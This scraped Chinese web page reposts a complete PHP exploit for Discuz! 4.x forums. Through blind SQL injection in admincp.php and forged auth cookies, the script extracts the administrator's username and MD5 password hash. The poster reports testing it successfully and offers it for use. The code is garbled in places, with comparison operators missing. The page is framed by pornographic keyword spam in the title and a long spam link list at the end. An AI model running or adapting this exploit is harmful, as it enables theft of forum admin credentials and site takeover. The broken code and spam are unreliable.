成人性生交大片免费看视频r_亚洲综合极品香蕉久久网_在线视频免费观看一区_亚洲精品亚洲人成人网在线播放_国产精品毛片av_久久久久国产精品www_亚洲国产一区二区三区在线播_日韩一区二区三区四区区区_亚洲精品国产无套在线观_国产免费www

主頁 > 知識(shí)庫 > Discuz! 4.x SQL injection / admin credentials disclosure exploit

Discuz! 4.x SQL injection / admin credentials disclosure exploit

熱門標(biāo)簽:寧夏保險(xiǎn)智能外呼系統(tǒng)哪家好 臨滄移動(dòng)外呼系統(tǒng)哪家有 溫嶺代理外呼系統(tǒng) 隨州銷售外呼系統(tǒng)平臺(tái) 不同的地圖標(biāo)注 交行外呼系統(tǒng)有哪些 怎么更改地圖標(biāo)注電話 激戰(zhàn)黃昏地圖標(biāo)注說明 防城港市ai電銷機(jī)器人

前段時(shí)間發(fā)過Discuz! 5.0.0 GBK版本的EXP
今天在CN.Tink那里看到的4.x的,我去原站轉(zhuǎn)了過來,然后找了個(gè)Discuz! 4.1.0測(cè)試了一下,成功,看下面截圖,Discuz! 5.0.0 GBK版本的那個(gè)EXP又許多朋友不知道怎么用,當(dāng)時(shí)我說了下,還是有朋友不明白,這次我截了圖上來,不知道怎么用的朋友看下應(yīng)該明白的。
圖:http://photo.bababian.com/20061105/E8D09F4CD48014220CD6C955EC88FAC9_500.jpg

復(fù)制代碼 代碼如下:

?php
print_r('
---------------------------------------------------------------------------
Discuz! 4.x SQL injection / admin credentials disclosure exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dork: "powered by discuz!
---------------------------------------------------------------------------
');
if ($argc3) {
 print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to discuz
Options:
 -p[port]: specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /discuz/ -P1.1.1.1:80
php '.$argv[0].' localhost /discuz/ -p81
---------------------------------------------------------------------------
');
 die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
 $result='';$exa='';$cont=0;
 for ($i=0; $i=strlen($string)-1; $i++)
 {
 if ((ord($string[$i]) = 32 ) | (ord($string[$i]) > 126 ))
 {$result.=" .";}
 else
 {$result.=" ".$string[$i];}
 if (strlen(dechex(ord($string[$i])))==2)
 {$exa.=" ".dechex(ord($string[$i]));}
 else
 {$exa.=" 0".dechex(ord($string[$i]));}
 $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
 }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)
{
 global $proxy, $host, $port, $html, $proxy_regex;
 if ($proxy=='') {
 $ock=fsockopen(gethostbyname($host),$port);
 if (!$ock) {
 echo 'No response from '.$host.':'.$port; die;
 }
 }
 else {
 $c = preg_match($proxy_regex,$proxy);
 if (!$c) {
 echo 'Not a valid proxy...';die;
 }
 $parts=explode(':',$proxy);
 echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
 $ock=fsockopen($parts[0],$parts[1]);
 if (!$ock) {
 echo 'No response from proxy...';die;
 }
 }
 fputs($ock,$packet);
 if ($proxy=='') {
 $html='';
 while (!feof($ock)) {
 $html.=fgets($ock);
 }
 }
 else {
 $html='';
 while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
 $html.=fread($ock,1);
 }
 }
 fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
 $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
 $proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]>'/') or ($path[strlen($path)-1]>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

echo "please wait...\n";

//from global.func.php
function authcode($string, $operation, $key = '') {
 $key = $key ? $key : $GLOBALS['discuz_auth_key'];
 $coded = '';
 $keylength = 32;
 $string = $operation == 'DECODE' ? base64_decode($string) : $string;
 for($i = 0; $i  strlen($string); $i += 32) {
 $coded .= substr($string, $i, 32) ^ $key;
 }
 $coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded;
 return $coded;
}

//stolen from install.php
function random($length) {
 $hash = '';
 $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
 $max = strlen($chars) - 1;
 mt_srand((double)microtime() * 1000000);
 for($i = 0; $i  $length; $i++) {
 $hash .= $chars[mt_rand(0, $max)];
 }
 return $hash;
}

$agent="Googlebot/2.1";
//see sql errors... you need auth key,
//it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;)
$tt="";for ($i=0; $i=255; $i++){$tt.=chr($i);}
while (1)
{
 $discuz_auth_key=random(32);
 $packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n";
 $packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof
 $packet.="User-Agent: $agent\r\n";
 $packet.="Host: ".$host."\r\n";
 $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$tt,"ENCODE").";\r\n";
 $packet.="Accept: text/plain\r\n";
 $packet.="Connection: Close\r\n\r\n";
 $packet.=$data;
 sendpacketii($packet);
 $html=html_entity_decode($html);
 $html=str_replace("br />","",$html);
 $t=explode("AND m.password='",$html);
 $t2=explode("' ",$t[1]);
 $pwd_f=$t2[0];
 $t=explode("AND m.secques='",$html);
 $t2=explode("'\n",$t[1]);
 $secques_f=$t2[0];
 $t=explode("AND m.uid='",$html);
 $t2=explode("'\x0d",$t[1]);
 $uid_f=$t2[0];
 $my_string=$pwd_f."\t".$secques_f."\t".$uid_f;
 if ((strlen($my_string)==270) and (!eregi("=",$my_string))){
 break;
 }
}
$temp = authcode("suntzu\tsuntzu\t".$tt,"ENCODE");
//calculating key...
$key="";
for ($j=0; $j32; $j++){
 for ($i=0; $i255; $i++){
 $aa="";
 if ($j>0){
 for ($k=1; $k=$j; $k++){
 $aa.="a";
 }
 }
 $GLOBALS['discuz_auth_key']=$aa.chr($i);
 $t = authcode($temp,"DECODE");
 if ($t[$j]==$my_string[$j]){
 $key.=chr($i);
 }
 }
}

//echo "AUTH KEY ->".$key."\r\n";
$GLOBALS['discuz_auth_key']=$key;

echo "pwd hash (md5) -> ";
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0)))
{
 for ($i=0; $i=255; $i++)
 {
 if (in_array($i,$chars))
 {
 //you can use every char because of base64_decode()...so this bypass magic quotes...
 //and some help by extract() to overwrite vars
 $sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
 $packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n";
 $packet.="User-Agent: $agent\r\n";
 $packet.="CLIENT-IP: 1.2.3.4\r\n";
 $packet.="Host: ".$host."\r\n";
 $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
 $packet.="Accept: text/plain\r\n";
 $packet.="Connection: Close\r\n\r\n";
 $packet.=$data;
 sendpacketii($packet);
 if (eregi("action=groupexpiry",$html)){
 $password.=chr($i);echo chr($i);sleep(1);break;
 }
 }
 if ($i==255) {
 die("\nExploit failed...");
 }
 }
$j++;
}

echo "\nadmin user -> ";
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
 for ($i=0; $i=255; $i++)
 {
 $sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
 $packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n";
 $packet.="User-Agent: $agent\r\n";
 $packet.="CLIENT-IP: 1.2.3.4\r\n";
 $packet.="Host: ".$host."\r\n";
 $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
 $packet.="Accept: text/plain\r\n";
 $packet.="Connection: Close\r\n\r\n";
 $packet.=$data;
 sendpacketii($packet);
 if (eregi("action=groupexpiry",$html)){
 $admin.=chr($i);echo chr($i);sleep(1);break;
 }
 if ($i==255) {die("\nExploit failed...");}
 }
$j++;
}

function is_hash($hash)
{
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}
}

if (is_hash($password)) {
 echo "exploit succeeded...";
}
else {
 echo "exploit failed...";
}
?>

標(biāo)簽:忻州 沈陽 哈密 阜陽 河源 青海 紅河 無錫

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《Discuz! 4.x SQL injection / admin credentials disclosure exploit》,本文關(guān)鍵詞  Discuz,4.x,SQL,injection,admin,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《Discuz! 4.x SQL injection / admin credentials disclosure exploit》相關(guān)的同類信息!
  • 本頁收集關(guān)于Discuz! 4.x SQL injection / admin credentials disclosure exploit的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    亚洲国产精品午夜在线观看| 欧美三级视频在线观看| 国产绿帽刺激高潮对白| 精品人伦一区二区三区蜜桃网站| 国产一级成人av| 网站一区二区三区| www.四虎影视.com| 亚洲欧美日韩精品久久奇米色影视| 夜夜躁狠狠躁日日躁婷婷小说| 亚洲精品午夜| 欧美日韩免费网站| 国产专区一区二区三区| 色噜噜狠狠色综合网图区| 欧美a级黄色大片| av美女网站| 日韩电影在线看| 美女久久久久久久| 少妇高潮一区二区三区喷水| 黄色小视频大全| 久久成人在线| 久久久久久国产精品| 国产av自拍一区| 日韩 欧美 视频| 99爱在线视频| 视频二区一区| 91免费在线视频网站| 久久国产中文字幕| 亚洲二区在线播放| 亚洲成人av一区二区| 欧美特黄一区| 国产高清中文字幕| 久久资源中文字幕| 折磨小男生性器羞耻的故事| 亚洲午夜精品久久久| 伊人久久精品一区二区三区| 国产美女主播在线播放| 另类视频在线观看+1080p| 经典三级一区二区三区视频| 欧美黑人欧美精品刺激| 国产伦一区二区| 国产精品久久久久久久app| 尤物视频在线观看国产| 中文字幕在线看视频国产欧美在线看完整| 性欧美18—19sex性高清| 欧美高清视频一二三区| 丰满少妇在线观看资源站| 一级做a爰片久久毛片| 日韩精品久久久久久久的张开腿让| 大杳蕉精品视频在线观看| 久久中文字幕免费| 欧美美女视频在线观看| 香港经典三级在线| 国产亚洲女人久久久久毛片| 热99在线视频| 国产精品丝袜久久久久久高清| 无码国产69精品久久久久网站| 日韩成人午夜电影| 亚洲天堂2016| 一级精品视频在线观看宜春院| 亚洲色图 在线视频| 色撸撸在线视频| 亚洲国产精品一| 色多多国产成人永久免费网站| 日韩精品免费在线| 91老司机精品视频| 最好看的2019年中文视频| 在线观看日韩羞羞视频| 在线免费看视频| 一区二区三区区四区播放视频在线观看| 久久久av毛片精品| 欧美日韩美女视频| 欧美色图片你懂的| 亚洲一级高清| 久久噜噜噜精品国产亚洲综合| 国内视频一区| 日本三级网站在线观看| 一本大道久久精品懂色aⅴ| 午夜精品久久久久久久久久| 色综合久久网| 日韩精品在线私人| 日本亚洲视频在线| 特级丰满少妇一级aaaa爱毛片| 丁香网亚洲国际| 国产精品久久久久久久浪潮网站| av网页在线| 风间由美性色一区二区三区四区| 久久久久99精品成人片试看| 亚洲色图 校园春色| 久久久久九九九九| 亚洲无线观看| 欧美日韩精品欧美日韩精品| 婷婷久久综合九色综合99蜜桃| 久久久影院免费| 精品国产乱码久久久久久果冻传媒| 四虎成人永久免费视频| av免费播放网站| 精品免费av| 国产在线免费视频| 日韩激情电影免费看| 日韩av一卡二卡三卡| 精品日产卡一卡二卡麻豆| 免费欧美激情| 粉嫩av性色av蜜臀av网站| 激情懂色av一区av二区av| 久久免费看视频| 婷婷中文字幕一区| 日本韩国欧美国产| 国产精品对白刺激久久久| 久久艹在线视频| 最近免费中文字幕大全免费版视频| 亚洲最大的网站| 特黄视频免费看| 国精产品一区一区三区有限在线| 韩国毛片一区二区三区| 久久97人妻无码一区二区三区| 中文字幕av一区二区三区| 茄子视频成人在线观看| 欧美人妇做爰xxxⅹ性高电影| 免费在线观看一区二区| 国产精品videossex久久发布| 91精品国产99久久久久久| 久久久久久久久国产一区| 91福利国产在线观看菠萝蜜| 美女做a视频| 色视频在线看| www.黄色在线| 青春草视频在线| 亚洲成av人片在线观看无| 日韩精品成人在线| 91蝌蚪精品视频| 成人免费网站在线观看视频| 日韩av不卡在线观看| 九色在线播放| 人人澡人一摸人人添| 日韩免费高清视频| 国产网红在线观看| 欧美一区三区二区| 亚洲美女欧洲| 中文字幕国产一区二区| 一级黄色免费看| 91香蕉亚洲精品| 国产成人麻豆免费观看| 97视频热人人精品免费| 日韩人在线观看| 黄色在线网站噜噜噜| 精品无码国产一区二区三区av| 51xx午夜影福利| 欧美性猛交xxxx乱大交少妇| 艳妇乳肉豪妇荡乳av无码福利| 日韩av在线免播放器| 福利写真视频网站在线| 精品久久久中文字幕| 日韩高清专区| 久久久久久久久岛国免费| 国产福利精品一区二区| 亚洲精选av在线| 看全色黄大色黄大片免责看的| 欧美一级鲁丝片| 成人免费激情视频| 最新版天堂资源中文官网| 韩国三级在线一区| 日本久久久久亚洲中字幕| 欧美日韩免费| 一区三区自拍| 精品成人佐山爱一区二区| 精品久久久久久久久久久久久久久久久久| ,亚洲人成毛片在线播放| 欧美乱大交xxxxx潮喷l头像| 国产精品偷拍| 又色又爽又高潮免费视频国产| 中文字幕av片| 亚洲1区在线观看| 亚洲最大色网站| 亚洲欧洲精品一区二区精品久久久| 国产精品久久久久免费a∨大胸| 亚洲激情在线播放| 国产成人自拍高清视频在线免费播放| 一区二区三区小说| 欧美在线你懂得| 一级毛片电影| 五码日韩精品一区二区三区视频| 隣の若妻さん波多野结衣| 亚洲国产欧美国产综合一区| aa视频在线播放| 亚洲少妇一区二区| 欧美wwwwxxxx| 成人黄网18免费观看的网站| 国产精品一区二区三区视频网站| 亚洲一二三精品| 精品无码人妻一区二区三区品| 欧美日韩福利在线观看| 成熟的女同志hd| 成 人免费视频播放| 天堂电影在线| 狠狠操图片视频| 免费精品国产自产拍观看| 黄色一级大片在线免费看国产| 免费欧美激情| 日本在线看片免费人成视1000| 国产深夜男女无套内射| 中文字幕福利视频| 日本五级黄色片| 99热国内精品永久免费观看| 91精品久久香蕉国产线看观看| 韩国精品在线观看| 国产精品系列在线播放| 日韩a在线播放| 欧美magnet| 亚洲欧美国产另类首页| eeuss国产一区二区三区四区| 精品视频在线免费看| 在线观看免费黄网站| 欧美视频www| 一区二区三区久久| av综合在线观看| 亚洲国产日韩精品| 国产区精品视频在线观看豆花| 亚洲欧美在线一区二区| 亚洲自拍偷拍色片视频| 欧美激情视频免费看| 欧美日韩国产三区| 91av网站在线播放| 日韩午夜电影免费看| 欧美日韩高清一区二区不卡| 精品在线免费观看视频| 999精品视频在线| 中文字幕国产欧美| 久久大综合网| 欧美日韩美少妇| 美女激情视频网站| 国产69精品久久久久999小说| 日本在线不卡一区二区| 四色最新网址| 国产精品无码专区av免费播放| 国产粉嫩在线观看| 在线亚洲人成电影网站色www| 亚洲精品写真福利| 久久久久无码国产精品不卡| 欧美一区二区三区成人片在线| 欧美激情久久久久久久| 天堂在线免费视频| 国产伦精品一区二区三区视频孕妇| 北岛玲一区二区三区四区| 夜鲁很鲁在线视频| 亚洲伦理一区二区三区| 亚洲**2019国产| 天天综合天天添夜夜添狠狠添| 亚洲综合视频在线播放| 欧美日韩国产精品综合| 久久精品男人天堂av| 国产无遮挡又黄又爽又色| 亚洲成人中文字幕| 欧美 日韩 国产 激情| 最新国产精品拍自在线播放| 黄色三级网站在线观看| 992tv免费直播在线观看| 欧美一区二区人人喊爽| 尤物九九久久国产精品的分类| 国产人成网在线播放va免费| 国产午夜精品在线观看| 成人免费毛片app| 久久夜色精品亚洲| 在线一区免费观看| 免费a视频在线观看| 在线视频日韩一区| 日韩一区二区中文| h片在线播放| gogo亚洲高清大胆美女人体| 先锋成人影音| 91精品国产美女浴室洗澡无遮挡| 色婷婷av一区二区三区久久| 国产九色视频| 国产精品性做久久久久久| 一区三区视频| 国产亚洲精品久久久久久777| 亚洲欧美国产精品va在线观看| 亚洲欧美在线高清| 女主播福利一区| 韩国一区二区三区视频| 91综合久久爱com| 99久久99久久精品国产片果冻| 亚洲熟妇无码久久精品| 亚洲熟妇无码av| 一区二区三区在线观看视频| 蜜桃自拍偷拍| 一区不卡字幕| 不卡的av中国片| 日韩区国产区| 欧美办公室脚交xxxx| 国产亚洲毛片在线| 国内外成人免费激情在线视频网站| 精品人妻一区二区三区蜜桃视频| 国产欧美日韩一区二区三区在线观看| 精品999日本久久久影院| 免费电影一区| 国内精品久久久久影院一蜜桃| 男人的天堂av社区在线| 久草在线网址| 欧美日韩中文字幕一区二区| 91麻豆精品国产91久久综合| 99在线高清视频在线播放| 国产精品magnet| 五月天视频在线观看| 在线视频亚洲| av在线免费一区| 日本aⅴ免费视频一区二区三区| 色小说视频一区| 日韩小视频在线观看| 99久久精品网| wwwxx欧美| 欧美性开放视频| 99久久人爽人人添人人澡| 影音先锋男人资源站在线观看| 色噜噜狠狠成人中文综合| 在线观看精品一区二区三区| 97在线免费视频| 中文字幕av不卡| 亚洲r级在线视频| 波多野结衣网页| 欧美精品久久久久性色| japanese色系久久精品| 午夜视频免费播放| 色综合久久一区二区三区| 天堂在线一二区| 尤物yw午夜国产精品视频| 18成人免费观看视频漫画| 美女视频一区二区三区| 啪啪免费视频一区|